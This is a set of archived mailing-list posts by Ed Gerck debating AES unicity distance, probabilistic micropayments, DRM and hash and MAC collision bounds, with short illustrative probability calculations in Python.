from an analysis of its ciphertext -- even though that may require some
large (actually, unspecified) amount of work. Thus, the likelihood of
two keys producing valid decipherments (plaintexts that can be
enciphered to the same ciphertext, natural language or not) from the
same ciphertext is ZERO after the message length exceeds the unicity
distance -- otherwise the message could not be uniquely deciphered
after the unicity condition is reached, breaking Shannon's result.

Conversely, Shannon also proved that if the intercepted message has less
than "n" (bits, bytes, letters, etc.) of plaintext then the message CANNOT
be uniquely deciphered from an analysis of its ciphertext -- even by trying
all keys and using unbounded resources.

> So unicity can't be used to
> answer the original question* definitively.

As above, it can. And the answer formulated in terms of the unicity
is valid for any plaintext/ciphertext pair, even for random bits. It
answers the question in all generality.

> I'd also point out that modern ciphers are expected to be secure
> against know plaintext attacks, which is generally a harsher
> condition than knowing the plaintext is in natural language.

No cipher is theoretically secure above the unicity distance, even though
it may be practically secure.

> * Here is the original question. It seems clear to me that he is
> asking about all possible plaintext bit patterns:
>
> At 2:06 PM +0100 2/17/03, Ralf-Philipp Weinmann wrote:
> >I was wondering whether the following is true:
> >
> >"For each AES-128 plaintext/ciphertext (c,p) pair there
> >  exists exactly one key k such that c=AES-128-Encrypt(p, k)."

The following is always true, for any possible plaintext bit pattern:

"For each AES-128 plaintext/ciphertext (c,p) pair with length
equal to or larger than the unicity distance, there exists exactly
one key k such that c=AES-128-Encrypt(p, k)."

Cheers,
Ed Gerck





Re: AES-128 keys unique for fixed plaintext/ciphertext pair?

2003-02-20 Thread Ed Gerck


Anton Stiglic wrote:

> > The statement was for a plaintext/ciphertext pair, not for a random-bit/
> > random-bit pair. Thus, if we model it in terms of a bijection on random-bit
> > pairs, we confuse the different statistics for plaintext, ciphertext, keys
> and
> > we include non-AES bijections.
>
> While your reformulation of the problem is interesting, the initial question
> was regarding plaintext/ciphertext pairs, which usually just refers to the
> pair
> of elements from {0,1}^n, {0,1}^n, where n is the block cipher length.

The previous considerations hinted at but did not consider that a
plaintext/ciphertext pair is not only a random bit pair.

Also, if you consider plaintext to be random bits you're considering a very
special -- and least used -- subset of what plaintext can be. And, it's a
much easier problem to securely encrypt random bits.

The most interesting solution space for the problem, I submit, is in the
encryption of human-readable text such as English, for which the previous
considerations I read in this list do not apply, and provide a false sense of
strength. For this case, the proposition applies -- when qualified for  the
unicity.

Cheers,
Ed Gerck






Re: AES-128 keys unique for fixed plaintext/ciphertext pair?

2003-02-18 Thread Ed Gerck

The relevant aspect is that the plaintext and key statistics are the
determining factors as to whether the assertion is correct or not.

In your case, for example, with random keys and ASCII text in English,
one expects that a 128-bit ciphertext segment would NOT satisfy the
requirement for a unique solution -- which is 150 bits of ciphertext.
However, since most cipher systems begin with a "magic number" or carry
a message format that begins with the usual "Received", "To:", "From:",
etc., it may be safer to consider a much lower unicity, for example less than
128 bits. In that case, even one block of AES would satisfy the requirements
-- and compression would NOT help.

Of course, keeping the same key while encrypting the next block would
also satisfy the requirements for the resulting 256-bit ciphertext/plaintext
pair to have a unique solution.[*]

Cheers,
Ed Gerck

[*] But note that if the plaintext has the full entropy of ASCII text in English
(as in your example) and compression is used, then the unicity should
increase to above 300 bits of ciphertext. The result is that a two-block
segment of ASCII text in English that is encrypted with the same key would
NOT satisfy the requirement for a unique solution.

Sidney Markowitz wrote:

> Ed Gerck <[EMAIL PROTECTED]> wrote:
>  > For each AES-128 plaintext/ciphertext (c,p) pair with length
> > equal to or larger than the unicity distance, there exists exactly
> > one key k such that c=AES-128-Encrypt(p, k).
>
> Excuse my naivete in the math for this, but is it relevant that the unicity
> distance of ASCII text encrypted with a 128 bit key is about 150 bits
> [Schneier, p 236] and the AES block size is only 128 bits? If you use plain
> ECB mode is the plaintext/ciphertext length in the above statement 128 bits,
> or does the statement imply that you have an arbitrary length (c,p) pair
> using whatever mode, possibly chaining, makes sense for your purpose?
>
>  -- sidney





Re: AES-128 keys unique for fixed plaintext/ciphertext pair?

2003-02-18 Thread Ed Gerck

The statement was for a plaintext/ciphertext pair, not for a random-bit/
random-bit pair. Thus, if we model it in terms of a bijection on random-bit
pairs, we confuse the different statistics for plaintext, ciphertext, keys and
we include non-AES bijections. Hence, I believe that what we got so far is
a good result... but for a different problem.

In this case, it seems to me that we need to take into account the maximum
possible entropy for the plaintext as well as the entropy of the actual plaintext,
and the entropy of the keys. With these considerations, with the usual
assumption that AES is a random cipher, we can say indeed [*]:

"For each AES-128 plaintext/ciphertext (c,p) pair with length
equal to or larger than the unicity distance, there exists exactly
one key k such that c=AES-128-Encrypt(p, k)."

Cheers,
Ed Gerck

[*] If AES is a random cipher and if the unicity distance "n" calculated
by the usual expression n = H(K)/[|M| - H(M)] for a random cipher,
where the quantities are:

H(K) = entropy of keys effectively used in encryption
|M| = maximum possible entropy for the plaintext
H(M) = entropy of actual message, the given plaintext

is equal to or smaller than the given ciphertext's length, then there
is only one possible decipherment of the given ciphertext -- i.e., there is
only one key k such that p=AES-128-Decrypt(c, k) and
c=AES-128-Encrypt(p, k).
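A numeric sketch of this expression (my illustrative per-byte entropy figures, not values from the message): plugging H(K) = 128 bits into n = H(K)/[|M| - H(M)] reproduces the regimes discussed in this thread -- the oft-quoted ~150 bits of ciphertext for ASCII English, exactly one AES block when the plaintext is fully predictable, and well past 300 bits when compression strips most of the redundancy.

```python
def unicity_bits(key_entropy, max_entropy, msg_entropy):
    """n = H(K) / (|M| - H(M)); per-byte entropies, result in bits of ciphertext."""
    redundancy = max_entropy - msg_entropy      # bits of redundancy per byte
    return key_entropy / redundancy * 8         # bytes -> bits

H_K = 128.0  # AES-128 key entropy, assuming uniformly random keys

# ASCII English at roughly 1.2 bits of the 8 possible bits per byte:
print(unicity_bits(H_K, 8.0, 1.2))   # ~150.6 bits of ciphertext
# Fully predictable plaintext ("Received", "To:", ...): zero entropy
print(unicity_bits(H_K, 8.0, 0.0))   # 128.0 bits: one AES block suffices
# Compressed English with, say, ~3 bits/byte of residual redundancy:
print(unicity_bits(H_K, 8.0, 5.0))   # ~341.3 bits: beyond two AES blocks
```

The better the compression, the smaller the redundancy term and the longer the ciphertext an attacker must collect before a unique decipherment exists.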

"Arnold G. Reinhold" wrote:

> At 1:09 PM +1100 2/18/03, Greg Rose wrote:
> >At 02:06 PM 2/17/2003 +0100, Ralf-Philipp Weinmann wrote:
> >>"For each AES-128 plaintext/ciphertext (c,p) pair there
> >>  exists exactly one key k such that c=AES-128-Encrypt(p, k)."
> >
> >I'd be very surprised if this were true, and if it was, it might
> >have bad implications for related key attacks and the use of AES for
> >hashing/MACing.
> >
> >Basically, block encryption with a given key should form a
> >pseudo-random permutation of its inputs, but encryption of a
> >constant input with a varying key is usually expected to behave like
> >a pseudo-random *function* instead.
> >
>
> Here is another way to look at this question. Each 128-bit block
> cipher is a 1-1 function from the set S = {0,1,...,(2**128-1)] on to
> itself, i.e. a bijection. Suppose we have two such functions f and g
> that are randomly selected from the set of all possible bijections
> S-->S (not necessarily ones specified by AES). We can ask what is the
> probability of a collision between f and g, i.e. that there exists
> some value, x, in S such that f(x) = g(x)?  For each possible x in S,
> the probability that f(x) = g(x) is 2**-128. But there are 2**128
> members of S, so we should expect an average of one collision for
> each pair of bijections.
>
> If the ciphers specified by AES behave like randomly selected
> bijections, we should expect one collision for each pair of AES keys
> or 2**256 collisions.  Just one collision violates Mr. Weinmann's
> hypothesis.  So it would be remarkable indeed if there were none.
> Still it would be very interesting to exhibit one.
>
> For ciphers with smaller block sizes (perhaps a 32-bit model of
> Rijndael), counting collisions and matching them against the expected
> distribution might be a useful way to test whether the bijections
> specified by the cipher are randomly distributed among all possible
> bijections.
>
> Arnold Reinhold
>
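Arnold's counting argument can be checked empirically: f(x) = g(x) exactly when x is a fixed point of the composed permutation g^(-1) o f, and a uniformly random permutation has one fixed point on average. A small simulation (my sketch, with toy-sized permutations standing in for 128-bit block ciphers):

```python
import random

rng = random.Random(2003)
N = 1000          # domain size, standing in for 2**128
TRIALS = 2000     # pairs of random permutations to sample

def random_permutation(n):
    p = list(range(n))
    rng.shuffle(p)
    return p

total = 0
for _ in range(TRIALS):
    f = random_permutation(N)
    g = random_permutation(N)
    # collisions between f and g = fixed points of g^(-1) o f
    total += sum(1 for x in range(N) if f[x] == g[x])

print(total / TRIALS)   # close to 1.0: one expected collision per pair
```

So if AES keys behaved like randomly selected bijections, a pair of keys would be expected to agree on about one input, as the quoted message argues.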





Copyright protection, DMCA, DRM and technology

2003-01-19 Thread Ed Gerck

The Supreme Court has rejected a challenge to the Sonny Bono Law.
 http://supremecourtus.gov/oral_arguments/argument_transcripts/01-618.pdf

Let's stir the pot.

Today, law is not the logic of ethics. It is the logic of power.

That said, let's recognize the power of technology that is also at play
here and look at the options that are left after the USSC decision. In
addition to the legal approach of allowing copyright owners to
selectively renounce their seemingly ever-engorgable rights (the Creative
Commons initiative by Lawrence Lessig), one may be able to provide
legal support for technology that -- rather ominously to some -- helps
users become trusted fair-users of copyrighted materials that are so
protected. DRM can be useful to users.

Why would DRM be useful to users? Because it could reduce the need
for legislation which outright curbs fair-use under the argument that
fair-use is "out of control" in the digital world.

Essentially, I'm making the point that fair-use of copyrighted material
can be technologically enforced and controlled, *notwithstanding*
cooperation (or lack thereof) by the user -- and that is why the user
can be trusted by Jack Valenti.

This argument, in broader terms, could reduce the perception and the
need to have legislation such as the DMCA, that uses the legal system
to protect what technology allegedly cannot (*).

Technology's role is to create tools to make it nearly impossible for
users to profit from an abuse of fair use, which allows laws such as
the DCMA to be questioned under legal arguments  -- for example,
unfair restriction of a buyer's rights.

Cheers,
Ed Gerck

(*) In other words, if it is axiomatic that we do not need much in
terms of legislation to prevent users from doing what is
technologically near-to-impossible, then by making available a
technology providing an absence of means for users to
significantly abuse fair use so technologically controlled, we
need less in terms of laws providing the control.





Re: DeCSS, crypto, law, and economics

2003-01-08 Thread Ed Gerck


Nomen Nescio wrote:

> John S. Denker writes:
> > The main thing the industry really had at stake in
> > this case is the "zone locking" aka "region code"
> > system.
>
> I don't see much evidence for this.  As you go on to admit, multi-region
> players are easily available overseas.  You seem to be claiming that the
> industry's main goal was to protect zone locking when that is already
> being widely defeated.
>
> Isn't it about a million times more probable that the industry's main
> concern was PEOPLE RIPPING DVDS AND TRADING THE FILES?

Well, zone locking helps curb this because it *reduces* the market for each
copy. The finer the zone locking resolution, the more effort an attacker needs
to make in order to be able to trade more copies.

Cheers,
Ed Gerck





Re: Micropayments, redux

2002-12-16 Thread Ed Gerck
David:

I'm happy you don't see any problems and I don't see
them either -- within the constraints I mentioned. But
if you work outside those #1, #2 and #3 constraints
you would have problems, which is something you may
want to look further into.

For example, in reply to my constraint  #2, you say:

 "This is expected to be roughly counterbalanced by the
 number of unlucky users who quite (sic) "while behind"."

but these events occur under different models. If there
is no prepayment (which is my point #2) then many users
can quit after few transactions and there is no statistical
barrier to limit this behavior. On the other hand, the number
of users who quit after being unlucky is a matter of statistics.
These are apples and speedboats. You need to have an
implementation barrier to handle #2.
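The statistical side of this exchange can be simulated (toy parameters of mine, not Peppercoin's): each 1-cent transaction is charged 100 cents with probability 1/100, so the bank's intake is 1 cent per transaction on average, and the relative spread of its total intake shrinks like 1/sqrt(N) -- the averaging that a quit-while-ahead user, the subject of constraint #2, would escape.

```python
import math
import random
import statistics

rng = random.Random(42)
P = 0.01          # sampling probability
CHARGE = 100      # cents charged when a transaction is sampled (factor 1/P)

def bank_intake(n_txns):
    """Bank revenue in cents over n nominally-1-cent sampled transactions."""
    return sum(CHARGE for _ in range(n_txns) if rng.random() < P)

for n in (1_000, 10_000):
    runs = [bank_intake(n) for _ in range(300)]
    mean = statistics.mean(runs)
    rel_spread = statistics.stdev(runs) / mean
    # theory: relative spread ~ sqrt((1 - P) / (P * n)), i.e. ~ 1/sqrt(n)
    print(n, round(mean), round(rel_spread, 3),
          round(math.sqrt((1 - P) / (P * n)), 3))
```

The mean intake tracks n cents while the relative spread drops by about sqrt(10) between the two runs, which is Wagner's 1/sqrt(N) point; the simulation says nothing about users who leave the pool early, which is the separate point above.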

Cheers,
Ed Gerck


David Wagner wrote:

> Ed Gerck  wrote:
> >1. If there is no limit, then the well-known doubling
> >strategy would allow the user to, eventually, make the
> >bank lose -- the user getting a net profit.
>
> I think you misunderstand the nature of the martingale strategy.
> It's not a good way to win in Las Vegas, and it's not a good way to
> win here, either.  Anyway, even if it were a problem, there would
> be lots of ways to prevent this strategy in a digital cash system.
>
> >2. If there is no prepaid amount, lucky users could quit
> >"while ahead" -- which would hurt the bank since those
> >users would be out of the pool to be charged, but they
> >have used the service.
>
> No problem.  This is expected to be roughly counterbalanced by the
> number of unlucky users who quite "while behind".
>
> >Another question, which answer I guess is more
> >market-related than crypto-related, is whether banks
> >will accept the liability of a losing streak ...for them.
> >[...] The problem here
> >is that, all things being fair, the system depends on
> >unlimited time to average things out.
>
> No, it doesn't.  It doesn't take unlimited time for lottery-based
> payment schemes to average out; finite time suffices to get the
> schemes to average out to within any desired error ratio.  The
> expected risk-to-revenue ratio goes down like 1/sqrt(N), where N
> is the number of transactions.  Consequently, it's easy for banks
> to ensure that the system will adequately protect their interests.
>
> And everything is eminently predictable.  Suppose the banks expect
> to do a 10^8 transactions, each worth $0.01.  Then their expected
> intake is $1 million, plus or minus maybe $1000 or so (the latter
> depends slightly on the exact parameter choices).  Any rational
> bank ought to be willing to absorb a few thousand in plus or minus,
> at this level of business.
>
> In short: I think your list of "problems" in the approach are not
> actually problematic in practice.
>





Re: Micropayments, redux

2002-12-16 Thread Ed Gerck

What follows below is from my dialogue with Ron
earlier this year, when the design was still being
worked out as he told me, when he kindly answered
some of my remarks --  which I also report below.

This is a very interesting proposal that creates a
large aggregate value worth billing for (in terms
of all operational and overhead costs), but which
large value the user will pay *on average*.

The user has a limit, and one idea is that the user
would pre-pay it (which may raise questions about
creating a barrier against spontaneous buying but
could be presented as an authorized credit limit,
I think) and then spend the limit in thousands (or more)
of "peppercorn-worth" (i.e., very small value -- maybe
cents or fractions of cents)  transactions that would be
paid only *on average*.  That is, most of the peppercorn
transactions would go *unpaid* and *unprocessed* -- thus,
with near zero overhead. However, some transactions would
hit the "jackpot" and be charged with a multiplicative
factor that -- on average -- pays for all unpaid transactions
and overhead.

Thus, because of the limit and the prepay, this can be seen
as a game that has no possible underpaying strategy
for the user, and the bank would be happy to let the
user play it as often as he likes -- with the following
caveats:

1. If there is no limit, then the well-known doubling
strategy would allow the user to, eventually, make the
bank lose -- the user getting a net profit.

2. If there is no prepaid amount, lucky users could quit
"while ahead" -- which would hurt the bank since those
users would be out of the pool to be charged, but they
have used the service.

3. The game is fair -- the bank will not "weigh the
wheel" (and hurt the users) and no one can compromise
the methods used by the bank (and hurt the bank).

Of course, if the wheel is not exactly balanced,
or if the house takes a cut in some other way,
then the user or the bank are losing ground at each
step.

Another question, which answer I guess is more
market-related than crypto-related, is whether banks
will accept the liability of a losing streak ...for them.
Likewise, users may lack motivation to continue using
the system if they have a losing streak (i.e., if they run
out of their prepaid amount sooner than what they and
the bank expects, and pre-pay again, and again run out
of money sooner than expected, and again until they
give up to be on the losing side). The problem here
is that, all things being fair, the system depends on
unlimited time to average things out.  This can be
compensated, I'd expect, by adequate human monitoring
and insurance. As always, it is not only the math that makes
things work -- even though it's also the math.

All things considered, though, as I said above this is a
very interesting proposal because it does reduce
processing and overhead costs to near zero for a large
number of transactions. I'd refrain from saying "zero"
because there should be some auditing involved for
all transactions.

Cheers,
Ed Gerck



Udhay Shankar N wrote:

> Ron Rivest is involved, too. Anybody got more info?
>
> http://www.peppercoin.com/peppercoin_is.html
>
> Peppercoin is a new approach to an old challenge: how to make small value
> transactions—micropayments—feasible. There is a whole world of digital
> content gathering dust because owners cannot find a profitable way to get
> it into the hands of paying customers.
>
> Merchants can profitably sell content or services at very low price points,
> which would be unprofitable with traditional payment methods.
> Consumers can purchase small-value items easily; PepperCoins are "digital
> pocket change" for music, games, and other downloads.
>
> Through a cryptographically secure process of sampling digital payments,
> Peppercoin reduces the volume of transactions processed by a third-party
> payment processor or financial institution. Peppercoin utilizes the most
> robust and secure digital encryption technologies, based on RSA digital
> signatures, to process and protect payments.
>
> Peppercoin's innovative technology is protected by worldwide patent
> applications.
>
> --
> ((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
>





Secure Electronic and Internet Voting

2002-11-19 Thread Ed Gerck
List:

I want to spread the word about a newly published book
by Kluwer, where I have a chapter explaining Safevote's
technology and why we can do in voting (a much harder
problem) what e-commerce has not yet accomplished (it's
left as an exercise for the reader to figure out why 
e-commerce has not yet done it; hints by email if you 
wish). This book serves as a good introduction to other 
systems and some nay-sayers.  The book's URL is
http://www.wkap.nl/prod/b/1-4020-7301-1

With the US poised to test Internet voting in 2004/6, 
this book may provide useful, timely points for the 
discussion. We can't audit electrons but we can certainly
audit their pattern.

Cheers,
Ed Gerck




Re: more snake oil? [WAS: New uncrackable(?) encryption technique]

2002-10-25 Thread Ed Gerck


bear wrote:

> The implication is that they have a "hard problem" in their
> bioscience application, which they have recast as a cipher.

Their problem is not hard -- it is just either slow to converge for
some methods or simply not uniquely determined (*). They consider
the cases that are not uniquely determined, which is equivalent to the
following problem:

   given Y solve for X in Y = X mod 11

(and I mean 11 as a good number for their problem space),
which has many answers. Indeed, the number of answers (‘keys’)
that fit the equation is infinite. Since they know the only "X" that they
consider (quite arbitrarily) to be the "right" answer, they say that
you can't guess it -- hence it is unbreakable in their view. However,
their search space is very small and all functional exponential forms
can be tried in parallel with much better algorithms than what they
seem to use (*). This is not better than short passwords, so that one
probably does not even need to break in and snatch the file holding
the keys to the kingdom -- the coefficients that were used.

(*) For an example, see the Prony method comment and reference in  
http://www-ee.stanford.edu/~siegman/Beams_and_resonators_2.pdf
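The non-uniqueness is easy to exhibit (a toy sketch of the mod-11 analogy only, not of the vendor's actual scheme): every eleventh integer is an equally valid "key" for a given Y.

```python
Y = 7
# All X with X % 11 == Y fit the observation; the first few non-negative ones:
candidates = [x for x in range(100) if x % 11 == Y % 11]
print(candidates)   # [7, 18, 29, 40, 51, 62, 73, 84, 95]
```

Knowing which of these the designer happens to call "the" answer is an arbitrary convention, not a cryptographic barrier -- which is the point of the message above.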

Cheers,
Ed Gerck





Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck


David Wagner wrote:

> Ed Gerck  wrote:
> >Wei Dai wrote:
> >> No matter how good the MAC design is, it's internal collision probability
> >> is bounded by the inverse of the size of its internal state space.
> >
> >Actually, for any two (different) messages the internal collision probability
> >is bounded by the inverse of the SQUARE of the size of the internal state space.
>
> No, I think Wei Dai had it right.  SHA1-HMAC has a 160-bit internal state.
> If you fix two messages, the probability that they give an internal collision
> is 1/2^160.
>
> Maybe you are thinking of the birthday paradox.  If you have 2^80 messages,
> then there is a good probability that some pair of them collide.  But this
> is the square root of the size of the internal state space.  And again, Wei
> Dai's point holds: the only way to reduce the likelihood of internal collisions
> is to increase the internal state space.
>
> In short, I think Wei Dai has it 100% correct.

Thanks again. I should have had some coffee at that time...I meant SQUARE ROOT.

As to the point you say is in question: "the only way to reduce the likelihood of
internal collisions is to increase the internal state space." -- this is clearly true
but is NOT what is in discussion here. The point is whether the only way to reduce
the likelihood of attacks based on MAC collisions is to increase the internal state
space. These statements are not equivalent.

> >Not really. You can prevent internal collision attacks, for example, by using
> >the envelope method (e.g., HMAC) to set up the MAC message.
>
> This is not accurate.  The original van Oorschot and Preneel paper
> describes an internal collision attack on MD5 with the envelope method.
> Please note also that HMAC is different from the envelope method, but
> there are internal collision attacks on HMAC as well.  Once again, I
> think Wei Dai was 100% correct here, as well.

However, it is possible to reduce the likelihood of attacks based on MAC
collisions WITHOUT increasing the internal state space. This is what I was
trying to explain. More below...

> You might want to consider reading some of the literature on internal
> collision attacks before continuing this discussion too much further.
> Maybe all will become clear then.

It's always good to read more, and learn more. But what I'm saying is
written in many such papers, including some that are written for
a general audience:

---
To attack MD5 [for example], attackers can choose any set of messages and
work on these  offline on a dedicated computing facility to find a collision.
Because attackers know the hash algorithm and the default IV, attackers can
generate the hash code for each of the messages that attackers generate. However,
when attacking HMAC, attackers cannot generate message/code pairs offline
because attackers do not know K. Therefore, attackers must observe a
sequence of messages generated by HMAC under the same key and perform
the attack on these known messages. For a hash code length of 128 bits, this
requires 2^64 observed blocks (2^73 bits) generated using the same key.
--in Dr. Dobbs, April 1999.

The point is clear: WITHOUT increasing the internal search space of MD5,
MD5 is used in a way that vastly reduces the likelihood of attacks based on
MAC collisions.

Cheers,
Ed Gerck








-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck
... pls read this message with the edits below... 
missing "^" in exp and the word "WITHOUT"...still no coffee...

David Wagner wrote:

> Ed Gerck  wrote:
> >Wei Dai wrote:
> >> No matter how good the MAC design is, its internal collision probability
> >> is bounded by the inverse of the size of its internal state space.
> >
> >Actually, for any two (different) messages the internal collision probability
> >is bounded by the inverse of the SQUARE of the size of the internal state space.
>
> No, I think Wei Dai had it right.  SHA1-HMAC has a 160-bit internal state.
> If you fix two messages, the probability that they give an internal collision
> is 1/2^160.
>
> Maybe you are thinking of the birthday paradox.  If you have 2^80 messages,
> then there is a good probability that some pair of them collide.  But this
> is the square root of the size of the internal state space.  And again, Wei
> Dai's point holds: the only way to reduce the likelihood of internal collisions
> is to increase the internal state space.
>
> In short, I think Wei Dai has it 100% correct.

Thanks again. I should have had some coffee at that time...I meant SQUARE ROOT.

As to the point you say is in question -- "the only way to reduce the likelihood
of internal collisions is to increase the internal state space" -- this is clearly
true, but it is NOT what is under discussion here. The point is whether the only
way to reduce the likelihood of attacks based on MAC collisions is to increase
the internal state space. These statements are not equivalent.

> >Not really. You can prevent internal collision attacks, for example, by using
> >the envelope method (e.g., HMAC) to set up the MAC message.
>
> This is not accurate.  The original van Oorschot and Preneel paper
> describes an internal collision attack on MD5 with the envelope method.
> Please note also that HMAC is different from the envelope method, but
> there are internal collision attacks on HMAC as well.  Once again, I
> think Wei Dai was 100% correct here, as well.

However, it is possible to reduce the likelihood of attacks based on MAC
collisions WITHOUT increasing the internal state space. This is what I was
trying to explain. More below...

> You might want to consider reading some of the literature on internal
> collision attacks before continuing this discussion too much further.
> Maybe all will become clear then.

It's always good to read more, and learn more. But what I'm saying is
written in many such papers, including some that are written for
a general audience:

---
To attack MD5 [for example], attackers can choose any set of messages and
work on these  offline on a dedicated computing facility to find a collision.
Because attackers know the hash algorithm and the default IV, attackers can
generate the hash code for each of the messages that attackers generate. However,
when attacking HMAC, attackers cannot generate message/code pairs offline
because attackers do not know K. Therefore, attackers must observe a
sequence of messages generated by HMAC under the same key and perform
the attack on these known messages. For a hash code length of 128 bits, this
requires 2^64 observed blocks (2^73 bits) generated using the same key.
--in Dr. Dobbs, April 1999.

The point is clear: WITHOUT increasing the internal search space of MD5,
MD5 is used in a way that vastly reduces the likelihood of attacks based on
MAC collisions.

Cheers,
Ed Gerck

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



collision resistance -- Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck
There seems to be a question about whether:

1. the internal collision probability of a hash function is bounded by the
inverse of the size of its internal state space, or

2. the internal collision probability of a hash function is bounded by the
inverse of the square root of the size of its internal state space.

If we assume that the hash function is a good one and thus its outputs are
uniformly distributed over the hash space (a good hash function is a good PRF),
then we can say:

For a hash function with an internal state space of size S, if we take n
messages x1, x2, ...xn, the probability P that there are i and j such that
hash(xi) = hash(xj), for xi <> xj, is

P = 1 - S!/((S^n)*(S - n)!)

which can be approximated by

P ~ 1 - e^(-n*(n - 1)/(2*S)).

We see above an n^2 factor, which translates into a sqrt(S) factor when we
solve for n. For example, if we ask how many messages N we need in order to
have P > 0.5, solving for n gives:

N ~ sqrt( 2*ln(2)*S ).

Thus, if we consider just two messages, affirmation #1 holds, because
P reduces to 1/S. If we consider n > 2 messages, affirmation #2 holds (the
birthday paradox).
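A quick numerical check of the two affirmations (a sketch; S here is a toy
state-space size, far smaller than a real hash function's):

```python
import math

def collision_prob(S, n):
    # Exact P = 1 - S!/((S^n)*(S-n)!), computed stably as a sum of logs.
    log_no_collision = sum(math.log1p(-i / S) for i in range(1, n))
    return -math.expm1(log_no_collision)

def approx_prob(S, n):
    # Approximation P ~ 1 - e^(-n*(n-1)/(2*S)).
    return -math.expm1(-n * (n - 1) / (2.0 * S))

S = 2**32  # toy internal state space; real hashes use e.g. 2^160
# Two messages: P reduces to about 1/S (affirmation #1).
print(collision_prob(S, 2), 1 / S)
# N ~ sqrt(2*ln(2)*S) messages give P close to 0.5 (affirmation #2).
N = round(math.sqrt(2 * math.log(2) * S))
print(N, collision_prob(S, N), approx_prob(S, N))
```

For S = 2^32 the crossover N is only about 77,000 messages, which is the
"surprise" of the birthday paradox.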

Cheers,
Ed Gerck






-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: collision resistance -- Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck


David Wagner wrote:

> > There seems to be a question about whether:
> >
> > 1. the internal collision probability of  a hash function is bounded by the
> > inverse of the size of its internal state space, or
> >
> > 2. the internal collision probability of a hash function is bounded by the
> > inverse of the square root of size of its internal state space.
> [...]
> > Thus, if we consider just two messages, affirmation #1 holds, because
> > P reduces to 1/S. If we consider n > 2 messages, affirmation #2 holds (the
> > birthday paradox).
>
> Umm, that's basically what I said in my previous message to the
> cryptography mailing list.  But my terminology was better chosen.
> In case 2, calling this "the internal collision probability" is
> very misleading; there is no event whose probability is the inverse
> of the square root of the size of the internal state space.

The event is finding 1 collision out of n messages.

> Again, this is nothing new.  This is all very basic stuff, covered
> in any good crypto textbook: e.g., _The Handbook of Applied Cryptography_.
> You might want to take the time to read their chapters on hash functions
> and message authentication before continuing this discussion.

;-) I never said it was new. But since you apparently sided with #1 and I
sided with #2, I was commenting that -- for once -- we both seem to be
right. BTW, the first time I read those chapters was in '97 and I still go
back to them when I need to brush up on something. The HAC is a great
book and, as you probably know, it's 100% available online too.

Cheers,
Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck


David Wagner wrote:

> Ed Gerck  wrote:
> >(A required property of MACs is providing a uniform distribution of values for a
> >change in any of the input bits, which makes the above sequence extremely
> >improbable)
>
> Not so.  This is not a required property for a MAC.
> (Not all MACs must be PRFs.)

Thanks. I should have written "a usually required property". In general,
to have a good MAC, we require a good PRF.

Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-23 Thread Ed Gerck


Wei Dai wrote:

> On Wed, Oct 23, 2002 at 05:01:52PM -0700, Ed Gerck wrote:
> > I think that there is a third (and dominating) possibility: this is a very bad MAC.
> > (A required property of MACs is providing a uniform distribution of values for a
> > change in any of the input bits, which makes the above sequence extremely
> > improbable)
>
> No matter how good the MAC design is, its internal collision probability
> is bounded by the inverse of the size of its internal state space.

Actually, for any two (different) messages the internal collision probability
is bounded by the inverse of the SQUARE of the size of the internal state space.

> The
> point is that you can't prevent an attacker from learning about an
> internal collision, once it happens, by hiding some of the state from the
> MAC tag.

You seem to say that even if some of the internal state is hidden from the MAC
tag, once an attacker sees a MAC collision he can deduce that an internal collision
occurred as well. If so, this is incorrect.

> The only way to prevent internal collision attacks is to
> decrease the internal collision probability, which unless the MAC is badly
> designed to begin with, requires increasing the size of the internal state
> space.

Not really. You can prevent internal collision attacks, for example, by using
the envelope method (e.g., HMAC) to set up the MAC message. In such a
case, having a previous message M the attacker can discover (e.g., by calculating
over a large number of messages) another message M* such that hash(M) =
hash(M*) -- i.e., an internal collision. However, finding this internal collision
CANNOT be leveraged into making the receiving party accept M* as genuine.

Thus, without increasing the size of the internal search space AND without
preventing internal collisions in any other way, it is possible to prevent an
attack that would use an internal collision.

> I'm sorry but I don't know how to explain this any better. I've tried to
> do it three different ways, and I hope someone else will do a better job
> if you still are not convinced.
>
> > BTW, references for using MAC subsets OR fixed-length messages to prevent
> > guessing the internal chaining value should be straight forward to find in the
> > literature.
>
> Those techniques may be useful when the attack requires knowing the
> internal state, but they are not useful when the attack only requires
> detecting collisions in the internal state. The literature you mention
> must be about the former case.

You seem to imply that it is harder to defend against an attacker who knows
less (one who only detects collisions) than against an attacker who knows more
(one who also knows the internal state). Logically, the reverse is true.

Also, please note that those techniques, and also the envelope method, are indeed
useful to prevent attacks when an attacker can detect collisions in the internal
state -- as my example above exemplifies.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-23 Thread Ed Gerck

Wei Dai wrote:

> ...
> suppose that an attacker finds two messages X and Y such that MAC(X|0) =
> MAC(Y|0), MAC(X|1) = MAC(Y|1), up to MAC(X|n) = MAC(Y|n). There are two
> possibilities: either there is a collision in the internal state after
> processing X and Y, or the internal states are different and all those MAC
> tags match up through seperate coincidences.
> ...

I think that there is a third (and dominating) possibility: this is a very bad MAC.
(A required property of MACs is providing a uniform distribution of values for a
change in any of the input bits, which makes the above sequence extremely
improbable)

BTW, references for using MAC subsets OR fixed-length messages to prevent
guessing the internal chaining value should be straightforward to find in the
literature.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Sidney Markowitz wrote:

> "Ed Gerck" <[EMAIL PROTECTED]> said:
